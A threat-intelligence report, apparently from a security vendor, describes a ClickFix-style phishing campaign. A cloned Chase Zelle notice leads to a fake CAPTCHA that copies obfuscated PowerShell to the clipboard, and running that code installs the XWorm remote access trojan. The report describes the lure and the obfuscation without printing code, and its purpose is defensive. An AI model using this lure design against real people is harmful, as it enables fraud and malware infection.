We continue to capture ClickFix and ClearFix–style clipboard injection attacks designed to trick users into bypassing typical security controls. While this attack chain has circulated for several years, its reemergence is notable because it has recently gained traction with state-sponsored threat actors aligned with Russia, North Korea, and Iran. That adoption signals both effectiveness and accessibility: tactics once relegated to low-level cybercrime are now appearing in high-value, politically motivated operations. This convergence of nation-state tradecraft in opportunistic campaigns matters because it lowers the barrier to impact, making simple yet damaging intrusions more likely across a wider range of targets.
In this example, attackers cloned a legitimate Chase Bank Zelle® fraud prevention notice and repurposed it to deliver their own malicious campaign. The original email is a routine advisory that Chase sends to customers about scams and buyer protections, but here it was weaponized to build trust and familiarity. The phishing email told recipients they were required to review a “mandatory” Zelle safety notice, yet the link led not to Chase but to a page hosted on Amazon Web Services infrastructure. Leveraging a trusted cloud provider to host the first stage is a common way to bypass some email filtering and reputation-based defenses, and it underscores why defenders cannot rely solely on domain reputation or vendor allow-lists.
Clicking the link funneled the victim to a spoofed Chase-branded page that looked convincing at a glance, with logos, formatting, and a familiar CAPTCHA-style human verification prompt. However, the domain used a [.]top TLD, a favorite of malicious actors due to its low cost and lax oversight. The attackers exploited that subtle difference to masquerade as a legitimate Chase resource. The significance of this detail is that phishing success often hinges on small lapses in scrutiny—an employee skimming too quickly might not notice the domain’s structure and assume authenticity, allowing attackers to find success.
The “verification” step is where the campaign escalates. Instead of genuinely confirming that the user is human, sliding the CAPTCHA bar silently copied an obfuscated PowerShell command into the user’s clipboard. When later instructed to paste and run it, unsuspecting victims would execute code that had been preloaded without their knowledge. The obfuscation used in this sample was simple but effective: the script inserted the number “2” throughout command strings to fragment and conceal a dotted-quad IP address used for retrieving the next-stage payload. This is important because clipboard-based delivery bypasses many traditional security models, relying on human reflexes rather than technical exploits. Users are conditioned to trust and follow verification prompts, which makes this blend of social engineering and script-based abuse unusually persuasive.
In this campaign, successful execution resulted in the download of the XWorm malware family. XWorm is a commodity remote access trojan that provides attackers with extensive control, including file exfiltration, credential harvesting, and command execution. More troubling, infections with XWorm have increasingly been observed as staging points for ransomware deployment. That link to ransomware is critical because it means a single click-and-paste mistake is no longer a minor infection but potentially the first step in a destructive enterprise-wide incident.
The broader lesson is that these attacks highlight the evolving interplay between social engineering and technical abuse. The attackers do not need zero-day exploits or advanced malware frameworks; instead, they rely on hijacking user trust, leveraging legitimate cloud infrastructure, and manipulating everyday user actions like clicking and pasting. This approach demonstrates why organizations must focus not only on patching software vulnerabilities but also on hardening human and process vulnerabilities. Without training and layered monitoring, even well-resourced organizations remain exposed to attacks that thrive on simplicity and psychological manipulation.
